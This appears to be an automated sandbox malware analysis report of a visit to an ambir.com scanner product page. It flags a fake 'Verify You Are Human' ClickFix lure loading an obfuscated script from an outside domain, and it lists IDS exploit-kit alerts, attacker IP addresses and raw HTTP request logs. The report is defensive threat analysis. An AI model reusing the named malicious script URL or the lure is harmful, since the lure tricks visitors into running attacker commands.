Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://ambir.com/ambir-card-scanners/

Overview

General Information

Sample URL:https://ambir.com/ambir-card-scanners/
Analysis ID:1559730
Infos:

Detection

CAPTCHA Scam ClickFix
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus detection for URL or domain
Suricata IDS alerts for network traffic
Yara detected CAPTCHA Scam ClickFix
HTML page contains obfuscated javascript
Phishing site or detected (based on various text indicators)
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64
  • chrome.exe (PID: 3180 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 1976 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1924,i,8983831127746973449,12403637480214134868,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7140 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6160 --field-trial-handle=1924,i,8983831127746973449,12403637480214134868,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6348 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ambir.com/ambir-card-scanners/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_265JoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security
    dropped/chromecache_158JoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security
      No Sigma rule has matched
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-20T21:28:41.119370+010020221121Exploit Kit Activity Detected192.168.2.54992534.111.113.62443TCP
      2024-11-20T21:28:41.188297+010020221121Exploit Kit Activity Detected192.168.2.549928104.18.26.193443TCP
      2024-11-20T21:28:41.299946+010020221121Exploit Kit Activity Detected192.168.2.54992435.214.136.108443TCP
      2024-11-20T21:28:49.907633+010020221121Exploit Kit Activity Detected192.168.2.54998634.96.127.16443TCP
      2024-11-20T21:28:51.860202+010020221121Exploit Kit Activity Detected192.168.2.55000034.96.127.16443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-20T21:28:27.532735+010028580011A Network Trojan was detected192.168.2.54980545.61.136.196443TCP
      2024-11-20T21:28:31.963906+010028580011A Network Trojan was detected192.168.2.54984545.61.136.196443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: https://nyciot.com/je5vl.jsAvira URL Cloud: Label: malware

      Phishing

      barindex
      Source: https://ambir.com/ambir-card-scanners/Joe Sandbox AI: Score: 7 Reasons: The brand 'Google' is classified as 'wellknown'., The URL 'ambir.com' does not match the legitimate domain 'google.com'., There is no direct association between 'ambir.com' and the brand 'Google'., The URL 'ambir.com' does not contain any elements that suggest it is related to Google., The input fields 'u, n, k, n, o, w, n' do not provide any context that associates with Google. DOM: 1.9.pages.csv
      Source: Yara matchFile source: dropped/chromecache_265, type: DROPPED
      Source: Yara matchFile source: dropped/chromecache_158, type: DROPPED
      Source: https://nyciot.com/je5vl.jsHTTP Parser: var _0x596311=_0xc2f2;(function(_0x2e4b0a,_0x8218b){var _0x341c59=_0xc2f2,_0x388ec9=_0x2e4b0a();w
      Source: Chrome DOM: 1.10OCR Text: Verify You Are Human Please verify that you are a human to continue. I'm not a robot Piv:cy - Terms
      Source: Chrome DOM: 1.11OCR Text: Verify You Are Human Please verify that you are a human to continue. I'm not a robot Piv:cy - Terms Contact us
      Source: Chrome DOM: 1.5OCR Text: Verify You Are Human Please verify that you are a human to continue. I'm not a robot Privszy - Term;
      Source: Chrome DOM: 1.6OCR Text: Verify You Are Human Please verify that you are a human to continue. I'm not a robot Privszy - Term;
      Source: https://ambir.com/ambir-card-scanners/HTTP Parser: No favicon
      Source: https://ambir.com/ambir-card-scanners/HTTP Parser: No favicon
      Source: https://ambir.com/ambir-card-scanners/HTTP Parser: No favicon
      Source: https://ambir.com/ambir-card-scanners/HTTP Parser: No favicon
      Source: https://ambir.com/ambir-card-scanners/HTTP Parser: No favicon
      Source: https://ambir.com/ambir-card-scanners/HTTP Parser: No favicon
      Source: https://ambir.com/ambir-card-scanners/HTTP Parser: No favicon
      Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49719 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 2.16.229.162:443 -> 192.168.2.5:49730 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:49731 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 2.16.229.162:443 -> 192.168.2.5:49748 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:50032 version: TLS 1.2

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2858001 - Severity 1 - ETPRO EXPLOIT_KIT LandUpdate808 Stage 2 Request : 192.168.2.5:49805 -> 45.61.136.196:443
      Source: Network trafficSuricata IDS: 2858001 - Severity 1 - ETPRO EXPLOIT_KIT LandUpdate808 Stage 2 Request : 192.168.2.5:49845 -> 45.61.136.196:443
      Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49928 -> 104.18.26.193:443
      Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49925 -> 34.111.113.62:443
      Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49924 -> 35.214.136.108:443
      Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:50000 -> 34.96.127.16:443
      Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49986 -> 34.96.127.16:443
      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
      Source: unknownTCP traffic detected without corresponding DNS query: 2.16.229.162
      Source: unknownTCP traffic detected without corresponding DNS query: 2.16.229.162
      Source: unknownTCP traffic detected without corresponding DNS query: 2.16.229.162
      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
      Source: global trafficHTTP traffic detected: GET /ambir-card-scanners/ HTTP/1.1Host: ambir.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-header-c51b1940.min.css HTTP/1.1Host: ambir.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://ambir.com/ambir-card-scanners/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-header-9afea242.min.css HTTP/1.1Host: ambir.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://ambir.com/ambir-card-scanners/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/themes/ambir/css/bootstrap.min.css HTTP/1.1Host: ambir.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://ambir.com/ambir-card-scanners/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/themes/ambir/css/lightbox.min.css HTTP/1.1Host: ambir.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://ambir.com/ambir-card-scanners/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/themes/ambir/css/hamburgers.css HTTP/1.1Host: ambir.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://ambir.com/ambir-card-scanners/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /bootstrap/3.3.7/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ambir.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/themes/ambir/css/font-awesome.css HTTP/1.1Host: ambir.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://ambir.com/ambir-card-scanners/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /js/sharethis.js HTTP/1.1Host: platform-api.sharethis.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/themes/ambir/css/owl.carousel.css HTTP/1.1Host: ambir.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://ambir.com/ambir-card-scanners/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /wp-content/themes/ambir/style.css?v=1732127239 HTTP/1.1Host: ambir.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://ambir.com/ambir-card-scanners/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-header-7ba40e52.min.js HTTP/1.1Host: ambir.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ambir.com/ambir-card-scanners/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/themes/ambir/js/owl.carousel.min.js HTTP/1.1Host: ambir.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ambir.com/ambir-card-scanners/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /bootstrap/3.3.7/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/lib/font-awesome/webfonts/fa-solid-900.woff2 HTTP/1.1Host: ambir.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ambir.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://ambir.com/wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-header-9afea242.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /wp-content/themes/ambir/images/search.png HTTP/1.1Host: ambir.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/ambir-card-scanners/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/themes/ambir/images/cerrar2.png HTTP/1.1Host: ambir.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/ambir-card-scanners/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/themes/ambir/images/search2.png HTTP/1.1Host: ambir.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/ambir-card-scanners/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-footer-b7463f6d.min.css HTTP/1.1Host: ambir.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://ambir.com/ambir-card-scanners/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-footer-71030d0b.min.js HTTP/1.1Host: ambir.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ambir.com/ambir-card-scanners/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
      Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=cHrHpX4bmlX+nvl&MD=3MZpu8fr HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
      Source: global trafficHTTP traffic detected: GET /wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-header-7ba40e52.min.js HTTP/1.1Host: ambir.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/themes/ambir/js/owl.carousel.min.js HTTP/1.1Host: ambir.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /je5vl.js HTTP/1.1Host: nyciot.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ambirtech/form/ScannerBrochureDownload/formperma/Ariy9HGiAVXh5JfOrGqqgQZdZYr8pgPgm4tTdrChjcU HTTP/1.1Host: forms.zohopublic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-footer-804f7b28.min.js HTTP/1.1Host: ambir.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ambir.com/ambir-card-scanners/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
